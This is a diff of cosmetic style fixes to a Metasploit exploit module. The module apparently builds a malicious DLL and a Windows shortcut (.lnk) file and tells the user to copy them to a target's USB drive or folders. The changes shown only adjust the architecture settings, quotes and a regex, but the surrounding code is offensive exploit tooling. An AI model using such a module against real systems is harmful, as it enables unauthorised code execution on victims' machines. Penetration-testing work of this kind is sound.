@@ -47,13 +47,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => true
         },
-        'Arch' => [ARCH_X86, ARCH_X64],
         'Payload' => {
           'Space' => 2048
         },
         'Platform' => 'win',
         'Targets' => [
-          [ 'Automatic', { 'Arch' => ARCH_ANY } ],
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ],
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
           [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
         ],
@@ -62,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_RESTARTS, ],
           'Reliability' => UNKNOWN_RELIABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
@@ -95,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
 
     if datastore['PATH']
-      lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
+      lnk = generate_link("#{datastore['PATH'].chomp('\\')}\\#{dll_name}")
       lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
       lnk_path = store_file(lnk, lnk_filename)
       print_status("#{lnk_path} created, copy to the target paths")
@@ -196,12 +195,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fname = ::File.split(fname).last
 
-    fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
+    fname.gsub!(/[^a-z0-9._-]+/i, '')
     fname << ".#{ext}"
 
     path = File.join("#{Msf::Config.local_directory}/", fname)
     full_path = ::File.expand_path(path)
-    File.open(full_path, "wb") { |fd| fd.write(data) }
+    File.open(full_path, 'wb') { |fd| fd.write(data) }
 
     full_path.dup
   end
